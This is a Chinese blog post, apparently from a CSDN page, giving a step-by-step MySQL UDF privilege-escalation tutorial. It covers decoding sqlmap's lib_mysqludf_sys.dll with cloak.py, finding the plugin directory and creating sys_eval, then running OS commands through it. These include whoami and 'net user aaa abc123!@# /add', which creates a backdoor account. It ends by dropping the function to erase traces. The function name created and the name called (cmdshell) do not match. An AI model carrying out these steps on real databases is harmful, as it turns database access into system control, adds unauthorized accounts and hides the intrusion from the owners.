mysql udf提权_mysql——udf提权

01

前言

udf = ‘user defined function‘,即‘用户自定义函数’。文件后缀为‘.dll’,常用c语言编写。

通过在udf文件中定义新函数,对MYSQL的功能进行扩充,可以执行系统任意命令。将MYSQL账号root转化为系统system权限。

02

思路

1.将udf文件上传到指定位置

sqlmap中有现成的udf文件,有linux版本和windows版本分为32位和64位,一定要选择对应系统的对应版本版本,否则会显示:Can‘t open shared library ‘udf.dll‘。尤其要注意

    sqlmap\udf\mysql\windows\32目录下存放着lib_mysqludf_sys.dll_

    sqlmap\udf\mysql\windows\64目录下为64位的lib_mysqludf_sys.dll_

但是sqlmap 中 自带 的shell 以及一些二进制文件,为了防止被误杀都经过异或方式编码,不能直接使用的。

可以利用sqlmap 自带的解码工具cloak.py,进入到 sqlmap\extra\cloak\cloak 目录下,执行命令:

python ./cloak.py -d -i  sqlmap\data\udf\mysql\windows\32\lib_mysqludf_sys.dll_ -o lib_mysqludf_sys.dll

会在当前目录下生成一个解锁后的lib_mysqludf_sys.dll

通过以下命令查看mysql的运行环境

show  variables like '%version%';

147c3934dcfe378ae88ed58d09179444.png

show variables like '%compile%';

f257351c6bdc8bbc1b635baa35c685cf.png

或者

select @@version_compile_machine;

0cbf859e5638a6ae0ff79a966c7d7fdb.png

可以判断是在64为的cpu上运行了win32的系统,因此我们的mysql程序也是32位的。在使用udf.dll文件时应该使用windows系统下32位的文件

sqlmap中的udf文件提供的函数:

sys_eval,执行任意命令,并将输出返回。

sys_exec,执行任意命令,并将退出码返回。

sys_get,获取一个环境变量。

sys_set,创建或修改一个环境变量。

有了udf文件,接下来就是利用各种办法上传到网站指定目录下 

MySQL<5.0,导出路径随意;

5.0 <= MySQL<5.1,则需要导出至目标服务器的系统目录(如:c:/windows/system32/)

MySQL 5.1以上版本,必须要把udf.dll文件放到MySQL安装目录下的lib\plugin文件夹下才能创建自定义函数。

通过以下命令查看mysql版本

select @@version;

select version();

aa05db3779a09e13cfc297c5499c7e83.png

根据不同的版本号,将udf.dll文件上传到对应的目录下。

本人所测试的mysql版本是5.5.53因此需要将udf.dll文件上传到mysal/lib/plugin目录下;

可以通过以下命令查看plugin文件夹的绝对路径:

select @@plugin_dir;

4fd3c31fbc0aaabe19dfe2af90d9ddeb.png

本次只讨论udf提权,上传过程忽略

create function sys_eval returns string soname 'udf.dll';

7c93138ba37080e5ab3fb50bf79a12d0.png

select cmdshell ('whoami');

ba72e23384d6d556b57ff8321e1de8cf.png

select cmdshell ('net user aaa abc123!@# /add');

5303867142ae807b76b3751fea066aa4.png

消除痕迹

drop function sys_eval;

1e39f5b761c2126752ca37fab55f72c7.png

4b74da1389304bb0efc96509bb74ebee.png

6392950524ef38bdab137e6e6b6f7ea4.png

扫码关注

微信号:JIANJIEXX_

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值